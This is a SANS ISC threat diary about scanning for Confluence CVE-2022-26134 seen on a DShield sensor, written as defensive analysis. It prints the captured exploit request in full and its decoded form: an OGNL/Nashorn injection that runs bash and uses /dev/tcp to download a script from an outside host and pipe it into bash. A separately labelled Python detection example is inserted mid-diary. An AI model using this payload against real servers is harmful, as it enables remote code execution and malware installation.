ISC Stormcast For Friday, March 1st, 2024

    Scanning for Confluence CVE-2022-26134

    Published: 2024-03-01
    Last Updated: 2024-03-01 00:21:20 UTC
    by Guy Bruneau (Version: 1)
    Keywords: Confluence, CVE-2022-26134, scan, DShield
    0 comment(s)

    I have added daemonlogger [1] for packet capture and Arkime [2] to visualize the packets captured by my DShield sensor, and started noticing this activity, which so far has only been sent to TCP/8090 and is URL- and base64-encoded. The DShield sensor started capturing this activity on 12 February 2024, inbound from various IPs in various locations.

    Activity Overview

    Using CyberChef [3] I decoded this URL:

    $%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27echo%20dnVybCgpIHsKCUlGUz0vIHJlYWQgLXIgcHJvdG8geCBob3N0IHF1ZXJ5IDw8PCIkMSIKICAgIGV4ZWMgMzw%2BIi9kZXYvdGNwLyR7aG9zdH0vJHtQT1JUOi04MH0iCiAgICBlY2hvIC1lbiAiR0VUIC8ke3F1ZXJ5fSBIVFRQLzEuMFxyXG5Ib3N0OiAke2hvc3R9XHJcblxyXG4iID4mMwogICAgKHdoaWxlIHJlYWQgLXIgbDsgZG8gZWNobyA%2BJjIgIiRsIjsgW1sgJGwgPT0gJCdccicgXV0gJiYgYnJlYWs7IGRvbmUgJiYgY2F0ICkgPCYzCiAgICBleGVjIDM%2BJi0KfQp2dXJsIGh0dHA6Ly9iLjktOS04LmNvbS9icnlzai93LnNofGJhc2gK%7Cbase64%20-d%7Cbash%27%29.start%28%29%22%29%7D/

    CyberChef Step 1 - URL Decode

    CyberChef Step 2 - From Base64

    This is the final result of decoding this URL. The actor is attempting to invoke the Nashorn Java script engine; the activity is similar to what is described in this CounterCraft article [5].

    ${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','echo 
    vurl() {
        IFS=/ read -r proto x host query <<<"$1"
        exec 3<>"/dev/tcp/${host}/${PORT:-80}"
        echo -en "GET /${query} HTTP/1.0\r\nHost: ${host}\r\n\r\n" >&3
        (while read -r l; do echo >&2 "$l"; [[ $l == $'\r' ]] && break; done && cat ) <&3
        exec 3>&-
    }
    vurl http://b.9-9-8[.]com/brysj/|bash
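    As an added example (not part of this diary), the following Python performs the same two decoding steps on a captured request path of the kind shown above and flags the markers a detection rule for this activity would key on. The sample path and its inner script are constructed for the example, with a harmless placeholder in place of the real downloader.

```python
"""Decode and triage a Confluence CVE-2022-26134 style request path.

Added example, not from the original diary: URL-decode the captured
path, flag the OGNL/Nashorn/ProcessBuilder markers, and recover the
base64 script that is piped into bash. Sample input is constructed.
"""
import base64
import re
from urllib.parse import unquote

# Strings present in the diary's decoded payload; seeing several of
# them in a request path to a Confluence host is a strong signal.
MARKERS = ("ScriptEngineManager", "nashorn", "ProcessBuilder", "base64 -d")

# Matches the "echo <b64> | base64 -d | bash" stage and captures the blob.
B64_PIPE = re.compile(r"echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+-d\s*\|\s*bash")


def triage(path: str) -> dict:
    """Return the decoded path, matched markers and the inner script, if any."""
    decoded = unquote(path)                      # step 1: URL decode
    hits = [m for m in MARKERS if m in decoded]
    ognl = "${" in decoded and "}" in decoded    # OGNL expression wrapper
    script = None
    match = B64_PIPE.search(decoded)
    if match:                                    # step 2: from base64
        try:
            script = base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace")
        except (ValueError, UnicodeDecodeError):
            script = None
    return {"decoded": decoded, "ognl": ognl, "markers": hits,
            "script": script, "suspicious": ognl and len(hits) >= 2}


# Constructed sample: same shape as the diary's capture, but the inner
# script is a harmless placeholder rather than the real downloader.
SAMPLE_SCRIPT = "echo constructed-sample\n"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode()).decode()
SAMPLE_PATH = (
    "/$%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29"
    ".eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C"
    "%27echo%20" + SAMPLE_B64 + "%7Cbase64%20-d%7Cbash%27%29.start%28%29%22%29%7D/"
)

if __name__ == "__main__":
    result = triage(SAMPLE_PATH)
    print("suspicious:", result["suspicious"], "markers:", result["markers"])
    print("inner script:\n" + (result["script"] or "<none>"))
```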

    When the above URL was submitted to a sandbox, it dropped two hashes: the first is known as a downloaded shell, while the second is still unknown.

    d4508f8e722f2f3ddd49023e7689d8c65389f65c871ef12e3a6635bbaeb7eb6e [7]


    Guy Bruneau IPSS Inc.
    My Handler Page
    Twitter: GuyBruneau
    gbruneau at isc dot sans dot edu
